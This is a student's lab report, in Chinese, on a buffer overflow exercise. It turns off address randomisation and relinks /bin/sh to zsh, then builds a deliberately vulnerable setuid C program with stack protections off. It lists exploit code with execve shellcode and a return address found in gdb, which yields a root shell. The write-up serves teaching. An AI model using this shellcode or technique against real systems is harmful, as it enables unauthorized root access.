缓冲区溢出实验 20181233
一、准备工作
实验楼提供的是 64 位 Ubuntu linux,而本次实验为了方便观察汇编语句,我们需要在 32 位环境下作操作,因此实验之前需要做一些准备:
sudo apt-get update sudo apt-get install -y lib32z1 libc6-dev-i386 lib32readline6-dev sudo apt-get install -y python3.6-gdbm gdb
二、初始设置
由于Ubuntu默认使用地址空间随机化来随机堆(heap)和栈(stack)的初始地址,这使得猜测准确的内存地址变得十分困难,而猜测内存地址是缓冲区溢出攻击的关键。
因此我们需要使用以下命令关闭这一功能
sudo sysctl -w kernel.randomize_va_space=0
许多shell程序在被调用时会自动放弃自己的特权,例如root 权限,而这个防护措施在 /bin/bash 中实现。因此我们使用另一个 shell 程序(zsh)代替 /bin/bash
sudo su cd /bin rm sh ln -s zsh sh exit
三、实验步骤
在 /tmp 目录下新建一个 stack.c 文件:
cd /tmp
vim stack.c
/* stack.c */ /* This program has a buffer overflow vulnerability. */ /* Our task is to exploit this vulnerability */ #include <stdlib.h> #include <stdio.h> #include <string.h> int bof(char *str) { char buffer[12]; /* The following statement has a buffer overflow problem */ strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char str[517]; FILE *badfile; badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str);
printf("Returned Propely\n"); return 1;
编译,并设置set-uid
sudo su gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c chmod u+s stack exit
在 /tmp
目录下新建一个 exploit.c
文件,用以攻击刚才的漏洞程序获得root权限:
/* exploit.c */ /* A program that creates a file containing code for launching shell*/ #include <stdlib.h> #include <stdio.h> #include <string.h> char shellcode[] = "\x31\xc0" //xorl %eax,%eax "\x50" //pushl %eax "\x68""//sh" //pushl $0x68732f2f "\x68""/bin" //pushl $0x6e69622f "\x89\xe3" //movl %esp,%ebx "\x50" //pushl %eax "\x53" //pushl %ebx "\x89\xe1" //movl %esp,%ecx "\x99" //cdq "\xb0\x0b" //movb $0x0b,%al "\xcd\x80" //int $0x80 ; void main(int argc, char **argv) { char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */ strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??"); //在buffer特定偏移处起始的四个字节覆盖sellcode地址 strcpy(buffer + 100, shellcode); //将shellcode拷贝至buffer,偏移量设为了 100 /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); }
注意上述代码,\x??\x??\x??\x?? 处需要改为 shellcode 保存在内存中的地址,因为发生溢出后这个位置要覆盖返回地址。
而 strcpy(buffer+100,shellcode),shellcode保存在 buffer + 100 的位置。下面将介绍寻找这个 buffer 的地址。
输入命令进入 gdb 调试:
gdb stack
disass main
根据strcpy(buffer + 100,shellcode);可计算 shellcode 的地址为 0xffffd4c0(十六进制) + 0x64(100的十六进制) = 0xffffd524(十六进制)
修改exploit.c文件,将 \x??\x??\x??\x?? 修改为 \x24\xd5\xff\xff 并编译。
gcc -m32 -o exploit exploit.c
运行攻击程序 exploit和漏洞程序 stack,观察结果:
可见,通过攻击,获得了root 权限。
四、总结
这次实验只需要按照实验楼的步骤做就行,不是很难,但是,因为之前一直用的是vscode,所以这次用vim编辑时,比较容易出错。
通过这次实验,我对缓冲区溢出攻击有了更深的认识。